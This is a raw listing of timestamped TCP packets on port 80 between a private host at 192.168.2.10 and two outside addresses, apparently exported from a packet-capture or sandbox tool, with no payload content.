Dec 12, 2024 16:48:47.573215008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.573301077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.573314905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.574242115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.574606895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.575195074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.575278044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.575721979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.576224089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.576301098 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.576457977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.576529980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.577198982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.577378035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.577486038 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.578217030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.579267979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.579279900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.579289913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.579319000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.579334021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.580262899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.580358028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.580413103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.581402063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.581412077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.581454992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.582300901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.582668066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.582762957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.583383083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.583394051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.583477974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.584331989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.584479094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.584549904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.585328102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.585786104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.585860014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.586504936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.586812019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.586888075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.588175058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.634766102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.676043034 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.676206112 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.676314116 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.676357985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.676405907 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.676556110 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.676604986 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.677407980 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.677463055 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.677558899 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.677598953 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.678273916 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.678322077 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.678441048 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.678479910 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.679301023 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.679354906 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.679635048 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.679680109 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.680320978 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.680375099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.680680037 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.680726051 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.681343079 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.681389093 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.681514025 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.681587934 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.682224035 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.682284117 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.682612896 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.682658911 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.683151007 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.683192968 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.683502913 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.683542967 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.684206009 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.684549093 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.684598923 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.685081005 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.685133934 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.685436964 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.685477972 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.686078072 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.686120987 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.686573029 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.686615944 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.726599932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.726722956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.726845980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.727093935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.727227926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.727329969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.728209972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.728318930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.728444099 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.729172945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.729183912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.729288101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.730178118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.730190039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.730281115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.731141090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.731405020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.731496096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.732201099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.732611895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.732700109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.733192921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.733205080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.733295918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.734211922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.736566067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.736577988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.736589909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.736602068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.736614943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.736684084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.736716032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.737330914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.737343073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.737442970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.738280058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.738569975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.738650084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.739342928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.739403009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.739510059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.740282059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.741177082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.741341114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.741362095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.741425037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.741476059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.742309093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.742366076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.742446899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.743360043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.744102001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.744463921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.744476080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.744554043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.745395899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.745661974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.745758057 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.746373892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.746598005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.746675968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.747380972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.747777939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.747978926 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.748393059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.748918056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.748991966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.749403000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.749903917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.750242949 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.750497103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.750509024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.750576019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.751461983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.751627922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.751704931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.752448082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.753498077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.753508091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.753519058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.753578901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.753590107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.754486084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.754690886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.755161047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.755512953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.755553007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.755639076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.756514072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.756814003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.756932020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.757570028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.758907080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.759022951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.759633064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.759670973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.759763002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.760050058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.760310888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.760723114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.760808945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.760876894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.761636019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.761745930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.761868000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.761965990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.762640953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.762758970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.762862921 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.763659000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.763930082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.764039040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.764705896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.764718056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.764825106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.765666962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.765959024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.766696930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.766792059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.767544985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.767740965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.767749071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.767756939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.767858028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.768832922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.769777060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.769784927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.769876003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.769910097 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.769932985 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.770778894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.771308899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.771440029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.771914005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.771922112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.772070885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.772877932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.772886992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.773026943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.773874044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.773883104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.774059057 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.775083065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.775093079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.775237083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.775865078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.775933027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.776036978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.776808977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.777134895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.777827978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.778017998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.778207064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.778898954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.778935909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.779035091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.779900074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.918895006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.918946028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.919348001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.919492006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.919521093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.920485020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.920586109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.920691967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.921552896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.922724962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.922732115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.922820091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.922945976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.923466921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.923472881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.923693895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.924463987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.925348043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.925426960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.925606012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.925611973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.925920963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.926469088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.926565886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.926595926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.927473068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.927556038 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.927665949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.928529024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.928627968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.929537058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.929543018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.929570913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.929678917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.930562973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.930696964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.931320906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.931550026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.931691885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.931924105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.932611942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.932845116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.933504105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.933583021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.933873892 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.934149027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.934731007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.934849024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.934850931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.935669899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.935676098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.935756922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.936666965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.936794996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.936822891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.937664032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.937673092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.937755108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.938664913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.938796043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.938890934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.939702034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.939804077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.939917088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.940709114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.940845966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.941138029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.941745996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.941826105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.942764997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.942770958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.942778111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.942867041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.943749905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.943840027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.943953991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.944802999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.944921970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.945271015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.945838928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.945844889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.945930958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.946832895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.946947098 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.947824001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.947829008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.947840929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.947915077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.948890924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.948961973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.949186087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.949944973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.949950933 CET	80	49946	185.81.68.147	192.168.2.10
